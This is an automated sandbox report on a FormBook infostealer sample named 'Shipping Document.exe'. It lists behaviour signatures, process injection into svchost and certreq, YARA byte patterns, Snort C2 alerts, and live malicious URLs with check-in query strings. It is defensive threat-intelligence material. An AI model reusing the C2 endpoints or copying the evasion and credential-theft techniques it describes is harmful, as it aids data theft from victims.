Edit tour

Windows Analysis Report
Shipping Document.exe

Overview

General Information

Sample name:	Shipping Document.exe
Analysis ID:	1447908
MD5:	d6e393603c46c4152ea7603ff047af86
SHA1:	664cfe9fa1b0df9d616d4158bb0b5742e62a1756
SHA256:	a70008d95ba3e813cd35c1c663aa46c3cf6c95eeaeccbfbdeb18597daec36647
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Shipping Document.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: D6E393603C46C4152EA7603FF047AF86)

svchost.exe (PID: 3820 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

tvtoHmZUTcBKRIVpHYXPXI.exe (PID: 2144 cmdline: "C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

certreq.exe (PID: 2444 cmdline: "C:\Windows\SysWOW64\certreq.exe" MD5: A18A70A77AAC4E9D59CFD65C969AF959)

tvtoHmZUTcBKRIVpHYXPXI.exe (PID: 2780 cmdline: "C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d7c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16e32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x67279:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x508e8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x933a2b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x91d09a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x933a2b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x91d09a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c9c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16032:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d7c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16e32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 2520, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 3820, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 2520, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 3820, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 160.251.148.118

Timestamp:	05/27/24-12:22:10.319360
SID:	2855465
Source Port:	63193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 3.33.130.190

Timestamp:	05/27/24-12:23:14.615156
SID:	2855465
Source Port:	63209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 203.161.43.227

Timestamp:	05/27/24-12:21:56.331665
SID:	2855465
Source Port:	63189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 199.59.243.225

Timestamp:	05/27/24-12:21:29.439800
SID:	2855465
Source Port:	63181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 199.59.243.225

Timestamp:	05/27/24-12:22:24.036463
SID:	2855465
Source Port:	63197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 38.47.207.149

Timestamp:	05/27/24-12:23:42.952231
SID:	2855465
Source Port:	63217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 212.227.172.253

Timestamp:	05/27/24-12:21:14.380304
SID:	2855465
Source Port:	63177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 172.67.190.203

Timestamp:	05/27/24-12:20:08.835239
SID:	2855465
Source Port:	63160
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 199.59.243.225

Timestamp:	05/27/24-12:23:00.502659
SID:	2855465
Source Port:	63205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 142.250.186.51

Timestamp:	05/27/24-12:20:32.726865
SID:	2855465
Source Port:	63164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 199.59.243.225

Timestamp:	05/27/24-12:20:59.368425
SID:	2855465
Source Port:	63173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 91.195.240.92

Timestamp:	05/27/24-12:23:29.267343
SID:	2855465
Source Port:	63213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 3.33.130.190

Timestamp:	05/27/24-12:20:46.049229
SID:	2855465
Source Port:	63169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 213.171.195.105

Timestamp:	05/27/24-12:21:42.893457
SID:	2855465
Source Port:	63185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.7 - Destination IP: 185.31.240.240

Timestamp:	05/27/24-12:22:46.698255
SID:	2855465
Source Port:	63201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.auronhouse.com/opfh/	Avira URL Cloud: Label: malware
Source: http://www.drapples.club/opfh/	Avira URL Cloud: Label: phishing
Source: http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: malware
Source: http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: malware
Source: http://www.ukscan.co.uk/opfh/	Avira URL Cloud: Label: malware
Source: http://www.pricekaboom.com/opfh/	Avira URL Cloud: Label: malware
Source: http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: malware
Source: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/	Avira URL Cloud: Label: malware
Source: http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: malware
Source: http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: malware
Source: http://www.annahaywardva.co.uk/opfh/	Avira URL Cloud: Label: malware
Source: http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: www.auronhouse.com	Virustotal: Detection: 8%			Perma Link
Source: http://www.auronhouse.com/opfh/	Virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for submitted file

Source: Shipping Document.exe	ReversingLabs: Detection: 54%
Source: Shipping Document.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Shipping Document.exe

Joe Sandbox ML: detected

Source: Shipping Document.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_01024696
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102C93C FindFirstFileW,FindClose,	1_2_0102C93C
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0102C9C7
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0102F35D
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0102F200
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0102F65E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_01023A2B
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_01023D4E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0102BF27
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02F3B8A0

Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4x nop then xor eax, eax		4_2_02F29330
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4x nop then pop edi		4_2_02F2DB25

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63160 -> 172.67.190.203:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63164 -> 142.250.186.51:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63169 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63173 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63177 -> 212.227.172.253:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63181 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63185 -> 213.171.195.105:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63189 -> 203.161.43.227:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63193 -> 160.251.148.118:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63197 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63201 -> 185.31.240.240:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63205 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63209 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63213 -> 91.195.240.92:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63217 -> 38.47.207.149:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.ziontool.xyz
Source:	DNS query: www.autonomyai.xyz

Source: Joe Sandbox View	IP Address: 185.31.240.240 185.31.240.240
Source: Joe Sandbox View	IP Address: 203.161.43.227 203.161.43.227

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: ZONEZoneMediaOUEE ZONEZoneMediaOUEE
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
